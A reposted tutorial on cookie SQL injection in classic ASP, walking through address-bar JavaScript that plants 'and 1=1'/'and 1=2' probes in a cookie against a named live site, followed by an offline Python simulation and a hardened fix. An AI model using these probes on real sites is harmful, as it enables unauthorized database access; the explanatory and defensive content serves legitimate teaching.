Cookie SQL injection

Source: Internet
Author: User
Tags: sql injection

Reposted from http://blog.sina.com.cn/s/blog_6b347b2a0101379o.html

The principle of cookie injection is the same as that of ordinary injection; the only difference is where the parameter is submitted. Ordinary injection sends it via GET or POST: with GET the injected statement is appended directly to the URL, with POST it is sent through a form. The difference between GET and POST is that GET parameters are visible in the IE address bar while POST parameters are not. Cookie injection submits the parameter in the cookie instead.

Compared with POST and GET injection, cookie injection is a bit more cumbersome: before injecting we first have to change the cookie, and for that we use JavaScript. In addition, two conditions are necessary for cookie injection to be possible:

Condition 1: The program filters the data submitted via GET and POST, but does not filter the data submitted in the cookie.

Condition 2: On top of condition 1, the program must read its parameters with a bare Request("xxx") instead of naming the collection (Request.QueryString("xxx") or Request.Form("xxx")). In classic ASP, Request("xxx") searches QueryString first, then Form, then Cookies (then ClientCertificate and ServerVariables), so when the parameter is absent from the URL and the form, the value from the cookie is used.

1. First open http://www.st3yy.com/experts_info.asp?id=128, wait until the page has loaded completely, then clear the IE address bar.

2. In the blank address bar, enter the following:
javascript:alert(document.cookie="id="+escape("128"));

(Here "id=" is the "id=" in http://www.st3yy.com/experts_info.asp?id=128, and escape("128") supplies the 128 from the same URL; both must be chosen according to the actual parameter name and value of the target page.)

3. After step 2, open another window and try to open http://www.st3yy.com/experts_info.asp? (with "id=128" removed), and see whether the page still loads normally.

4. You can see that the page now looks exactly the same as when http://www.st3yy.com/experts_info.asp?id=128 was opened earlier, even though the URL no longer carries the id.

From this we can see that the program does not name a collection when reading data through the Request object; it uses Request("xx") directly, so it picked up id from the cookie.

One important condition for cookie injection is now confirmed.

5. Next, test whether special characters get through, i.e. whether the program filters the cookie data. Go back to the page where we changed the cookie and enter in the IE address bar (the id value must stay in front of the payload, otherwise the query becomes "id=and 1=1" and errors for the wrong reason):

javascript:alert(document.cookie="id="+escape("128 and 1=1"));

6. Reload the page without the id parameter and check whether it is still normal. If it is, set the cookie again with:

javascript:alert(document.cookie="id="+escape("128 and 1=2"));

7. If the page now differs (an error or no record is shown), the cookie value is reaching the SQL query unfiltered. The rest of the work is the same as for GET and POST injection, except that every payload is delivered through the cookie.
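The two conditions and steps 1 to 7 above can be reproduced offline against a simulated page. The script below is an added example, not code from the original post or the site it names: it models a classic ASP page of the kind described (an assumed stand-in for experts_info.asp, filtering GET/POST input but reading id with a bare Request("id") and concatenating it into SQL), with an in-memory SQLite table of constructed rows as the database, and a hardened variant of the same page for comparison. The keyword filter, table name and row data are assumptions.

```python
"""Cookie injection walk-through, simulated offline.

Added example, not code from the original post. The ASP page, its filter,
the experts table and its rows are all assumed; the real site is never
contacted.
"""
import re
import sqlite3
from urllib.parse import parse_qs, unquote, urlsplit

BASE = "http://www.st3yy.com/experts_info.asp"  # URL from the post; never contacted


def js_escape(s: str) -> str:
    """Port of JavaScript's escape(), which the post's snippet uses to build the
    cookie value: alphanumerics and @*_+-./ pass through, the rest becomes %XX
    (or %uXXXX above U+00FF)."""
    out = []
    for ch in s:
        cp = ord(ch)
        if cp < 0x80 and (ch.isalnum() or ch in "@*_+-./"):
            out.append(ch)
        elif cp < 0x100:
            out.append(f"%{cp:02X}")
        else:
            out.append(f"%u{cp:04X}")
    return "".join(out)


def asp_request(name, query, form, cookies):
    """Classic ASP Request(name) with no collection named: QueryString is
    searched first, then Form, then Cookies (ClientCertificate and
    ServerVariables come after those and are omitted here)."""
    for coll in (query, form, cookies):
        if name in coll:
            return coll[name]
    return ""


# Assumed keyword filter applied to GET and POST input only (condition 1).
GET_POST_FILTER = re.compile(r"(?i)\b(and|or|select|union|insert|update|delete)\b|'|--")


def _parse_cookie(header):
    """Request.Cookies hands back URL-decoded values; model that with unquote."""
    pairs = (p.split("=", 1) for p in header.split(";") if "=" in p)
    return {k.strip(): unquote(v.strip()) for k, v in pairs}


def make_db():
    """Constructed sample data standing in for the real experts table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE experts (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO experts VALUES (?, ?)",
                   [(127, "expert A"), (128, "expert B"), (129, "expert C")])
    return db


def vulnerable_page(db, url, cookie_header=""):
    """Simulated vulnerable page (conditions 1 and 2 both hold). Returns the body."""
    query = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    if any(GET_POST_FILTER.search(v) for v in query.values()):
        return "illegal parameter"                    # only GET/POST is checked
    ident = asp_request("id", query, {}, _parse_cookie(cookie_header))
    if not ident:
        return "no id"
    sql = "SELECT name FROM experts WHERE id=" + ident  # string concatenation
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as e:
        return f"database error: {e}"
    return " ".join(r[0] for r in rows) or "not found"


def hardened_page(db, url, cookie_header=""):
    """Same page with both conditions removed: id is read from the query string
    only, must be an integer, and is bound as a parameter."""
    query = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    ident = query.get("id", "")
    if not ident.isdigit():
        return "illegal parameter"
    rows = db.execute("SELECT name FROM experts WHERE id=?", (int(ident),)).fetchall()
    return " ".join(r[0] for r in rows) or "not found"


def cookie_probe(page, db, value):
    """Steps 2-4: store the cookie exactly as document.cookie="id="+escape(value)
    would, then request the URL with ?id= removed."""
    return page(db, BASE + "?", "id=" + js_escape(value))


def cookie_injectable(page, db, base_value="128"):
    """Steps 5-7: boolean test. True when 'and 1=1' behaves like the plain id
    and 'and 1=2' does not, i.e. the cookie value reached SQL unfiltered."""
    normal = cookie_probe(page, db, base_value)
    true_case = cookie_probe(page, db, base_value + " and 1=1")
    false_case = cookie_probe(page, db, base_value + " and 1=2")
    return normal == true_case and normal != false_case


if __name__ == "__main__":
    db = make_db()
    print("GET with payload   :", vulnerable_page(db, BASE + "?id=128 and 1=2"))
    print("cookie with payload:", cookie_probe(vulnerable_page, db, "128 and 1=2"))
    print("vulnerable page injectable:", cookie_injectable(vulnerable_page, db))
    print("hardened page injectable  :", cookie_injectable(hardened_page, db))
```

Running it shows the same payload being rejected on the query string and accepted from the cookie, which is exactly the asymmetry the two conditions describe; the hardened variant fails the probe because it never consults the cookie and binds the id as a parameter, so either fix alone would already close this path.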

